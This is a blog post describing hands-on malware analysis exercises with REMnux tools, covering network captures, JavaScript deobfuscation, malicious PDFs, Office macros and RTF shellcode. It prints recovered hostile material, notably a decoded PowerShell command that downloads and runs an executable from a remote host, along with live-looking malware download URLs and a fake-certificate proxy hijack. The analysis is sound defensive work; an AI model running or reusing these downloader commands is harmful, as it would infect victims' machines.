DEV Community

Khalif AL Mahmud
Khalif AL Mahmud

Posted on

A Deep Dive into Malware Analysis: Deobfuscation, Shellcode Extraction, and Document Forensics

When most people think about malware analysis, they picture someone staring at assembly code for hours. And sure, that's part of it. But the reality is far more varied — and honestly, more interesting. A huge chunk of real-world malware analysis work happens at a layer above disassembly: extracting obfuscated scripts from documents, carving shellcode out of PDFs, reconstructing attack chains from network captures, and understanding how adversaries abuse everyday file formats like Word docs and Excel spreadsheets to deliver payloads.

I recently spent some serious hands-on time working through a range of malware samples across different formats — from compromised website traffic and obfuscated JavaScript to malicious PDFs, RTFs, and Office documents. The goal wasn't just to run tools blindly, but to understand the why behind each technique: why attackers choose certain obfuscation methods, why specific file formats are attractive delivery vehicles, and how analysts can peel back the layers to expose the underlying behavior.

This article walks through that entire journey — the tools, the commands, the thought process, and what I learned along the way.


The Problem Statement

Modern malware delivery is rarely a single executable anymore. Attackers have moved toward:

  • Compromised websites serving malicious scripts and exploit kits
  • Obfuscated JavaScript that hides payload delivery mechanisms
  • Malicious PDFs embedding JavaScript and shellcode
  • Office documents (.doc, .docm, .xlsx) with macros or embedded OLE objects
  • RTF files with embedded shellcode or exploit objects

Each of these presents a unique analysis challenge. The common thread? Everything is obfuscated, layered, and designed to evade static detection. As an analyst, your job is to strip away those layers without executing the malware in a live environment.

This article covers a full analysis pipeline across 15 exercises, organized into logical categories: network traffic analysis, script deobfuscation, PDF forensics, Office document analysis, and shellcode extraction.


Part 1: Analyzing Network Traffic to Reconstruct an Attack

The first part of the analysis starts with network artifacts. When a victim visits a compromised website, a lot happens behind the scenes — redirects, script injections, exploit kit delivery, and eventually payload retrieval. Capturing and analyzing that traffic is often the best way to understand the full infection chain.

Setting Up the Lab Environment

For this analysis, I used two virtual machines:

  • Windows REM Workstation — for Windows-based tools like Fiddler, Wireshark, and scdbg
  • REMnux — a Linux distro purpose-built for malware analysis

All samples were extracted to the appropriate directories on both systems before starting analysis.

Analyzing Traffic with Fiddler

Fiddler is a fantastic tool for inspecting HTTP/HTTPS traffic at the application layer. I loaded a saved session archive (session-fiddler.saz) to inspect the traffic from a compromised site.

# On Windows REM Workstation - open session-fiddler.saz in Fiddler
# (Double-click the file or use File > Load Archive)
Enter fullscreen mode Exit fullscreen mode

Finding the compromise: The first request to www.hiltongardeninnoakville.com returned a 200 OK response. Decoding the response body revealed an injected script at the bottom of the page referencing my.GEORGETHORPEBOURBON.COM — a clear indicator of a compromised site serving malicious content.

Following the chain: The first request to my.georgethorpebourbon.com returned heavily obfuscated JavaScript. The next request returned a response starting with "CWS" — the signature of a Flash file. Further down, two requests for /default.jpg from 195.154.122.33 returned the word "default" instead of an actual image. Interestingly, these requests were made by a process named 963e.tmp rather than explorer.exe, suggesting the exploit had already triggered and dropped a payload.

Deep-Diving with Wireshark

For packet-level inspection, I loaded the same traffic in Wireshark (session.pcap).

# Display filter to isolate traffic from the suspicious IP
ip.addr == 195.154.122.33
Enter fullscreen mode Exit fullscreen mode

The most interesting finding was the last HTTP POST request to /setting/get_setting.php. The request body contained two notable parameters:

  • key — potentially part of a key exchange protocol (suggesting ransomware behavior)
  • idn — likely a unique identifier for the infected system, used for decryption ransom demands

Extracting Files with CapTipper

CapTipper is a REMnux tool that automates file extraction from PCAP files — incredibly useful for pulling out payloads that were transferred during the attack.

# On REMnux
cd /opt/remnux-captipper
mkdir /tmp/out
./CapTipper.py -g -d /tmp/out ~/malware/day3/session.pcap

# List extracted files
ls /tmp/out

# Identify the Flash program
file /tmp/out/* | grep Flash

# The suspicious Flash file was found at: /tmp/out/70-index.php
Enter fullscreen mode Exit fullscreen mode

CapTipper successfully carved out the Flash payload from the network traffic, which could then be analyzed further with tools like swfdump.


Part 2: Deobfuscating JavaScript — Three Different Approaches

JavaScript deobfuscation is a core skill for any malware analyst. I worked through three different scripts, each requiring a different technique.

Technique 1: Using the Internet Explorer Debugger

The file session.html contained obfuscated JavaScript that ultimately loaded a Flash exploit. The approach here was elegant in its simplicity: use the browser's own debugger to let the script do the deobfuscation work for you.

Step 1 — Beautify and inspect the script:

# Open session.html in Notepad++
# Plugins > JSTool > JSMin (remove extraneous components)
# Plugins > JSTool > JSFormat (reformat for readability)
Enter fullscreen mode Exit fullscreen mode

After beautifying, I identified a function l that implemented the deobfuscation algorithm, ending with return r;. This was the perfect breakpoint location.

Step 2 — Revert and insert debugger statement:

// Revert to original, then add debugger; at the start of the second <script> tag:
<script>debugger;if /*sidgfdfdf81669kdfl*/((/*sidgf73056dfdfkdfl*/gffsd/*sidgfdfdfd40511fkdfl*/))/*xY2YtOTZi52952OC00NDQ*/{
    function ...
Enter fullscreen mode Exit fullscreen mode

Step 3 — Debug in Internet Explorer:

  1. Open the modified session.html in IE
  2. Press F12 to open Developer Tools → Debugger tab
  3. Reload the page and click "Allow blocked content"
  4. The debugger pauses at the debugger; statement
  5. Search for return r, right-click, and insert a breakpoint
  6. Click Continue (Play button) to let the script run to the breakpoint
  7. Switch to Console tab and type:
console.group(r)
Enter fullscreen mode Exit fullscreen mode

The console displayed the fully deobfuscated script, which revealed an <object> tag loading a Flash program via clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 — confirming the behavioral analysis from Part 1.

Technique 2: Using SpiderMonkey for Headless Deobfuscation

For fgg.js, the obfuscation relied on location.href — something that only exists in a real browser context. SpiderMonkey is a JavaScript engine that runs scripts without a browser, but we need to provide the missing objects.

# First attempt — fails because 'location' is not defined
js -f fgg.js
# Error: "location is not defined"

# Second attempt — provide default object definitions
js -f /usr/share/remnux/objects.js -f fgg.js
# Runs but output is unreadable — wrong location.href value

# Fix: Copy and modify objects.js to set the correct URL
cp /usr/share/remnux/objects.js .
# Edit objects.js:
location = {
    href:"http://www.gitporg.com/cgi-bin/index.cgi?fgg"
}

# Execute with the corrected location
js -f objects.js -f fgg.js > fgg2.js
scite fgg2.js &
Enter fullscreen mode Exit fullscreen mode

The deobfuscated fgg2.js revealed a malicious URL we hadn't seen before — demonstrating how providing the right environmental context can unlock hidden behavior in obfuscated scripts.

Technique 3: Using box-js for Environment Emulation

For contact_vcf.wsf, both SpiderMonkey and manual analysis fell short. This is where box-js shines — it's a full JavaScript environment emulator designed specifically for malware analysis.

# SpiderMonkey attempt — incomplete deobfuscation
js -f /usr/share/remnux/objects.js -f contact_vcf.wsf | more
# Error: "_87867t67t6gt is not defined"

# box-js — much more comprehensive
box-js contact_vcf.wsf | more
Enter fullscreen mode Exit fullscreen mode

box-js not only deobfuscated the script but also created a contact_vcf.wsf.results directory with detailed analysis artifacts:

# Check extracted URLs
more contact_vcf.wsf.results/urls.json
# Found: http://sapanboon.com/ne7ptotr

# Examine downloaded files
file contact_vcf.wsf.results/* | more

# Analyze the PE executable that was downloaded
peframe contact_vcf.wsf.results/795* | more
Enter fullscreen mode Exit fullscreen mode

Part 3: PDF Forensics — Extracting Embedded Threats

PDFs are a classic malware delivery vector. They can embed JavaScript, launch external programs, and hide shellcode in encoded streams. I analyzed several malicious PDFs using a systematic approach.

Analyzing ctk.pdf — Base64-Encoded PowerShell

The file ctk.pdf had an OpenAction dictionary designed to auto-launch a PowerShell command. The -EncodedCommand parameter was clearly Base64-encoded.

# Examine the PDF structure
scite ctk.pdf &

# Decode manually using base64 utility
base64 -d
# Paste the encoded string, press Enter, then Ctrl+D

# Output:
# PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command
# (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/awori.exe',
# $env:APPDATA\awori.exe); Start-Process ($env:APPDATA\awori.exe)
Enter fullscreen mode Exit fullscreen mode

For a more automated approach:

# Identify all Base64 strings in the PDF
base64dump.py ctk.pdf

# Extract and decode the largest one (ID: 2)
base64dump.py ctk.pdf -s 2 -S
Enter fullscreen mode Exit fullscreen mode

The decoded command was a classic downloader — grab an executable from a remote server, save it locally, and execute it.

Analyzing collab.pdf — JavaScript, Shellcode, and Exploits

This was a more complex PDF with multiple layers of obfuscation.

Step 1 — Initial assessment with pdfid.py:

pdfid.py collab.pdf
# Reports: /JavaScript present — high risk indicator
Enter fullscreen mode Exit fullscreen mode

Step 2 — Locate JavaScript objects:

pdf-parser.py collab.pdf --search JavaScript | more
# Found objects: 1 0, 7 0, 12 0 (references to 10 0 and 13 0)
Enter fullscreen mode Exit fullscreen mode

Step 3 — Extract and decode the stream:

pdf-parser.py collab.pdf --object 10
pdf-parser.py collab.pdf --object 13

# Save decoded stream from object 13
pdf-parser.py collab.pdf --object 13 --filter --raw -d collab.txt
scite collab.txt &
Enter fullscreen mode Exit fullscreen mode

Step 4 — Fix and deobfuscate the JavaScript:
The script had a function defined through a misleading tuple assignment:

hyltlzyr=("kasg","vfys","zsjj","qtkj","zfch","tmxf","eits","ydcy","huzl","xovi","bhpe","lktc")[("rirh","msas","qxsf","mkva","xdax","goib","hsie","lzem","nkls","eval")];
Enter fullscreen mode Exit fullscreen mode

This was just a convoluted way of setting hyltlzyr = eval. I simplified it:

hyltlzyr=eval;
Enter fullscreen mode Exit fullscreen mode

Then ran it through SpiderMonkey:

js -f /usr/share/remnux/objects.js -f collab.txt > collab2.txt
scite collab2.txt &
Enter fullscreen mode Exit fullscreen mode

Step 5 — Extract the shellcode:
The deobfuscated script contained a Unicode-encoded shellcode string. I used base64dump.py with the percent-Unicode (-e pu) encoding option:

# Locate the encoded shellcode
base64dump.py -e pu collab2.txt

# Extract and save the binary shellcode (ID: 1)
base64dump.py -e pu collab2.txt -s 1 -d > collab-out.bin
Enter fullscreen mode Exit fullscreen mode

Step 6 — Emulate shellcode execution with scdbg:

# On Windows REM Workstation with scdbg:
# Load collab-out.bin, keep default settings, click Launch
Enter fullscreen mode Exit fullscreen mode

The scdbg output revealed the shellcode calling URLDownloadToFileA to fetch an executable from 94.247.2.157, saving it as %Temp%\wJQs.exe, then launching it via WinExec.

Analyzing page.pdf — From Shellcode to Executable

The page.pdf file used XFA forms to embed JavaScript and shellcode — a technique commonly seen in exploit kits.

Step 1 — Initial scan:

pdfid.py page.pdf
peepdf.py -fl page.pdf
# Reports: AcroForm in object 3, XFA in object 2
Enter fullscreen mode Exit fullscreen mode

Step 2 — Trace object references:

pdf-parser.py page.pdf --object 3  # Refers to object 2
pdf-parser.py page.pdf --object 2  # Refers to object 1
pdf-parser.py page.pdf --object 1  # Contains the stream
Enter fullscreen mode Exit fullscreen mode

Step 3 — Extract and decode:

pdf-parser.py page.pdf --object 1 --filter --raw -d page.txt
scite page.txt &
Enter fullscreen mode Exit fullscreen mode

The stream contained an XFA form with JavaScript defining a shellcode variable using \u Unicode encoding.

Step 4 — Extract shellcode:

# Locate backslash-Unicode encoded strings
base64dump.py page.txt -e bu

# Examine the largest string (ID: 3) — starts with \u9090 (NOP sled)
base64dump.py page.txt -e bu -s 3 -a | more

# Save as binary
base64dump.py page.txt -e bu -s 3 -d > page-out.bin
Enter fullscreen mode Exit fullscreen mode

Step 5 — Convert shellcode to executable:

shellcode2exe.py page-out.bin
# Creates: page-out.exe
Enter fullscreen mode Exit fullscreen mode

Step 6 — Behavioral confirmation with INetSim:
I transferred page-out.exe to the Windows VM and executed it while running fakedns and INetSim on REMnux to simulate internet services. The executable immediately tried to connect out — confirming downloader behavior. Process Hacker showed a.exe running on the desktop (the default binary INetSim serves).

# On REMnux — terminal 1
fakedns

# On REMnux — terminal 2
inetsim

# The shellcode attempted to download from: http://www.exploitmaze.com/01akin.exe
Enter fullscreen mode Exit fullscreen mode

Part 4: Microsoft Office Document Analysis

Office documents with malicious macros remain one of the most common initial access vectors. I analyzed several document types, each presenting different challenges.

media.docm — Downloader Macro

# Extract macros with olevba.py
olevba.py media.docm | more
Enter fullscreen mode Exit fullscreen mode

The macro used MSXML2.XMLHTTP to download http://softtonic.biz/cr/20014.exe and saved it to %AppData%\q\q.com, then executed it. Classic downloader behavior.

# Extract the docx internals
unzip media.docm -d media

# Examine the embedded image
feh media/word/media/image2.jpg &

# Find URLs in the VBA project
strings vbaProject.bin | grep http
strings --encoding=l vbaProject.bin | grep http
# Found: softtonic.biz AND dropboxusercontent.com (interesting secondary URL)

# Examine macro streams
oledump.py vbaProject.bin
oledump.py -s 3 -v vbaProject.bin | more
Enter fullscreen mode Exit fullscreen mode

message.docm — Dropper with Hex-Embedded Executable

This one was more sophisticated — the macro didn't download anything. Instead, it extracted an executable that was already embedded inside the document.

olevba.py message.docm | more
Enter fullscreen mode Exit fullscreen mode

The macro iterated through every paragraph in the document, extracting hexadecimal characters, converting them to binary, and saving the result as %UserProfile%\BrhotakdNdVMM.exe.

# Extract and examine the document contents
unzip message.docm -d message
scite message/word/document.xml &
Enter fullscreen mode Exit fullscreen mode

The document.xml contained hidden hexadecimal values formatted in white text (FFFFFFFF) on a white background — invisible to the victim, but parseable by the macro.

# Use the provided extraction script
python message_extract.py message.docm extracted.exe
Enter fullscreen mode Exit fullscreen mode

invoice.doc — XOR-Obfuscated Macro

The invoice.doc macro used a two-layer decoding scheme: Hextostring followed by XORI, which XORed two strings together. The macro also had heavy junk code with endless GoTo statements and randomly-named labels.

# Extract the macro
oledump.py invoice.doc
oledump.py invoice.doc -s 7 -v > invoice.txt
scite invoice.txt &
Enter fullscreen mode Exit fullscreen mode

Despite the obfuscation, I could spot method names: Open, Send, responseBody — all indicating HTTP download behavior.

Manual XOR decoding with xor-kpa.py:

xor-kpa.py -x '#h#2B07372B185D480C222A1C3B3204' '#h#66546F'
xor-kpa.py -x '#h#122F20' '#h#556A74'
xor-kpa.py -x '#h#152D2404270A0924' '#h#634F42'
xor-kpa.py -x '#h#29240416204F3B3C111625021B38081522' '#h#7A4C61'
xor-kpa.py -x '#h#391F2913' '#h#6D5A6443716F69'
xor-kpa.py -x '#h#2406210B022E063F0B173F0C5F2A2D1D' '#h#7854714F55'
xor-kpa.py -x '#h#123E070240655C1B173A1600132B1F17142F0115036410135520005D18231D5C1F3216' '#h#7A4A7372'
xor-kpa.py -x '#h#1D1C3F19' '#h#495972'
xor-kpa.py -x '#h#39081E31141237140A37041C4B3F3610' '#h#655A4E754344'
Enter fullscreen mode Exit fullscreen mode

Decoded results revealed: MSXML2.XMLHTTP, GET, Shell.Application, TEMP, and the download URL: http://imperialenergy.ca/js/bin.exe.

Automated extraction with oledump.py plugin:

oledump.py invoice.doc -p plugin_http_heuristics
# Automatically extracted: http://imperialenergy.ca/js/bin.exe
Enter fullscreen mode Exit fullscreen mode

poc.doc — P-Code Macros

This was a fascinating edge case. The document contained no extractable macro source code — only compiled p-code.

# olevba.py finds nothing
olevba.py poc.doc

# oledump.py lists streams but no 'M' markers
oledump.py poc.doc

# But stream 7 contains suspicious binary content
oledump.py poc.doc -s 7 | more

# Extract and disassemble the p-code
pcodedmp.py -d poc.doc | more
Enter fullscreen mode Exit fullscreen mode

The p-code disassembly revealed two ArgsCall instructions: one displaying a message box ("This could have been a virus!") and another using Shell to execute calc.exe — a classic proof-of-concept demonstrating that p-code can execute even when no source code is present.


Part 5: RTF Document Analysis and Shellcode Extraction

RTF files are another popular delivery format because they can embed objects and obfuscate content through excessive nesting.

payment.doc — Deeply Nested RTF with Embedded Shellcode

# Count the number of {} groups — abnormally high count suggests obfuscation
rtfdump.py payment.doc | wc -l
# Output: ~23,000 lines

# List only groups containing objects
rtfdump.py payment.doc -f O
Enter fullscreen mode Exit fullscreen mode

Group 166 stood out: Level 5 nesting, 1,194,787 bytes, with 11,417 hex characters.

# Examine the suspicious group
rtfdump.py payment.doc -s 166 | more

# Convert hex to bytes and examine
rtfdump.py payment.doc -s 166 -H > payment-out2.txt
scite payment-out2.txt &
Enter fullscreen mode Exit fullscreen mode

Scrolling through the hex dump in SciTE, I spotted the telltale signs: a \x90\x90\x90\x90 NOP sled at offset 0xBA0, followed by assembly instructions, and strings like LoadLibraryA, URLDownloadToFileA, WinExec, plus the URL http://rtnlogistics.com/nestom22.exe at offset 0xCB0.

Carving the shellcode:

rtfdump.py payment.doc -s 166 -H -c 0xBA0:0xCE0 -d > payment-out.bin
Enter fullscreen mode Exit fullscreen mode

After transferring to Windows and emulating in scdbg, the shellcode confirmed its behavior: downloading from rtnlogistics.com, saving as word.scr, and executing via WinExec.

qa.doc — RTF Dropper with jmp2it Dynamic Analysis

The qa.doc file was more complex — the shellcode didn't just download a payload, it actually created a fake WINWORD.EXE file and embedded a multi-stage dropper inside it.

# Locate the suspicious group
rtfdump.py qa.doc
# Group 5: large size, high nesting level

# Extract the binary content
rtfdump.py qa.doc -s 5 -H -d > qa-out.bin
Enter fullscreen mode Exit fullscreen mode

Finding shellcode patterns with XORSearch:

xorsearch -W -d 3 qa-out.bin
# Results:
# GetEIP pattern at 0x3B (cleartext, XOR key 0)
# Similar pattern at 0x5D (XOR key F3)
Enter fullscreen mode Exit fullscreen mode

The GetEIP pattern at 0x3B indicated the likely shellcode entry point.

Emulating in scdbg with proper context:

# On Windows REM Workstation with scdbg:
# - Enable "Start Offset" and enter: 3B
# - Enable "fopen" checkbox and point to qa.doc
# - Click Launch
Enter fullscreen mode Exit fullscreen mode

The shellcode called GetFileSize (returning 357ab hex = 219,051 bytes — the exact size of qa.doc), created C:\Program Files (x86)\Microsoft Office, and made ReadFile/WriteFile calls to generate WINWORD.EXE.

Live execution with jmp2it:

# On Windows Command Prompt:
jmp2it qa-out.bin 0x3B addhandle qa.doc
Enter fullscreen mode Exit fullscreen mode

After 30-60 seconds, I checked C:\Program Files (x86)\Microsoft Office and found the newly created WINWORD.EXE. Extracting it with 7-Zip revealed three files:

  • 1.vbs — launches test.bat in a hidden window
  • test.bat — runs start comres.exe -p123qwe
  • comres.exe — a password-protected self-extracting archive containing comres.dll

The endgame: the DLL gets dropped into %SystemRoot% (C:\Windows), where a separate attack component can load it.


Part 6: Excel with Embedded JavaScript and Certificate Injection

The sbb.xlsx file was an unusual case — it contained an embedded JavaScript script inside an OLE2 object, designed to manipulate browser proxy settings and inject a fake SSL certificate.

# List streams
oledump.py sbb.xlsx
# Found: oleObject1.bin with large stream A3 (27,162 bytes)

# Get info about the stream
oledump.py sbb.xlsx -s A3 -i
# Filename: sbb_ch_29.29.2929.js (what Excel saves to %Temp%)

# Extract the JavaScript
oledump.py sbb.xlsx -s A3 -d > sbb-out.js
Enter fullscreen mode Exit fullscreen mode

After cleaning non-JavaScript text from the file (removing header/footer garbage), I deobfuscated it:

# Run through SpiderMonkey
js -f /usr/share/remnux/objects.js -f sbb-out.js > sbb-out2.js

# The output references reverse() — try reversing all strings
rev sbb-out2.js > sbb-out3.txt
scite sbb-out3.txt &
Enter fullscreen mode Exit fullscreen mode

The reversed strings revealed alarming capabilities:

  • taskkill /F /im chrome.exe, firefox.exe, iexplore.exe
  • Registry manipulation: AutoConfigURL, AutoDetect (browser proxy settings)
  • PowerShell execution with -ExecutionPolicy Unrestricted
  • IP detection via api.ipify.org and icanhazip.com
  • Connection to an onion.link URL (TOR network proxy)

Deeper analysis with box-js:

box-js sbb-out.js --no-shell-error --no-file-exists > sbb-out4.txt
scite sbb-out4.txt &
Enter fullscreen mode Exit fullscreen mode

box-js emulated the script's full behavior and saved artifacts in sbb-out.js.results/. The resources.json showed the script generating cert.der files in %Temp%. Converting with OpenSSL:

openssl x509 -in 56a9* -inform der -text -noout | more
# Result: A fake certificate claiming to be from "COMODO Certification Authority"
Enter fullscreen mode Exit fullscreen mode

The full picture: this script kills browsers, installs a fake CA certificate, redirects traffic through a TOR-proxied attacker server via proxy AutoConfig, and uses the victim's public IP as a parameter in the callback URL.


How to Verify Your Analysis

Throughout this process, I used several validation techniques to confirm findings:

Verification Method When to Use Expected Confirmation
scdbg emulation After extracting shellcode API call sequence matches hypothesis (e.g., URLDownloadToFileAWinExec)
INetSim + fakedns For downloaders Process attempts HTTP/HTTPS connection, receives default binary
Process Hacker Live execution on Windows New process spawned with expected name and parent relationship
File command After carving binaries Output matches expected type (PE, Flash, etc.)
peframe PE files post-extraction Suspicious APIs (network, process creation) present in import table
7-Zip extraction Self-extracting archives Internal structure reveals staging components (batch files, DLLs)
Hash verification Cross-referencing samples Same file hash across different extraction methods confirms consistency

What I Learned

This deep dive reinforced several important lessons:

1. Layered obfuscation is the norm, not the exception. Every single sample used multiple layers — hex encoding, XOR, reversed strings, tuple assignments, junk code, excessive nesting. Attackers know analysts are looking, so they add friction at every step.

2. Context matters for deobfuscation. The fgg.js script wouldn't deobfuscate correctly until location.href was set to the exact URL it expected. Environmental awareness — understanding what objects and values a script relies on — is critical.

3. The right tool for the right job. SpiderMonkey worked for some scripts, but box-js was necessary for others. pdfid.py gives a quick risk assessment, but pdf-parser.py does the heavy lifting. scdbg is great for emulation, but jmp2it reveals behavior that emulation might miss.

4. Network artifacts tell the full story. Even the most obfuscated document ultimately needs to communicate. Traffic analysis (Fiddler, Wireshark, CapTipper) often provides the clearest view of the attacker's end goal.

5. P-code is a real threat. The poc.doc exercise showed that documents can execute malicious macros even when no source code is extractable. Tools like pcodedmp.py fill a critical gap that traditional macro extractors can't handle.

6. Certificate attacks are sophisticated. The sbb.xlsx sample demonstrated a multi-stage attack involving fake CA certificates, browser proxy hijacking, and TOR-concealed command-and-control — a level of sophistication that goes well beyond simple downloaders.


Common Mistakes to Avoid

Mistake Why It Happens How to Avoid
Forgetting to revert beautified scripts before debugging Beautification can break execution Always work from the original, insert your debugger;, then save
Wrong location.href in objects.js Copy-pasting without checking Verify the URL matches where the script was originally hosted
Missing the correct stream in oledump.py Not checking all streams Use oledump.py without flags first to see the full listing and identify 'M' markers
Forgetting -H flag with rtfdump.py Confusion between hex view and binary extraction Remember: -H converts hex characters to bytes; without it you get text output
Incorrect shellcode offset in scdbg Assuming shellcode starts at offset 0 Use XORSearch or manual hex analysis to find NOP sleds or GetEIP patterns
Not enabling fopen in scdbg for context-dependent shellcode Shellcode reads from the original file If the shellcode accesses the parent document, use addhandle or fopen
Skipping the -d flag in base64dump.py Misunderstanding output format -d outputs raw binary; without it you might get hex or ASCII representations

Conclusion

Malware analysis is as much about methodology as it is about tools. Each sample in this exercise required a slightly different approach, but the underlying process remained consistent: observe, hypothesize, extract, verify. Whether you're looking at a compromised website's traffic, an obfuscated JavaScript file, a suspicious PDF, or a macro-laden Office document, the goal is always to answer the same questions: What does this do? How does it do it? And what would it have done if it had succeeded?

The breadth of techniques covered here — from browser debugging and JavaScript emulation to PDF stream extraction, shellcode carving, and p-code disassembly — reflects the reality of modern threat analysis. Attackers use the full range of file formats and delivery mechanisms available to them. As analysts, we need to be equally versatile.

If you're building your malware analysis skills, I'd encourage you to set up a similar lab environment (REMnux + Windows VM), grab some samples, and work through them systematically. The hands-on experience of peeling back obfuscation layers and watching a hidden payload reveal itself never gets old.

Stay curious, stay skeptical, and always verify.

Top comments (0)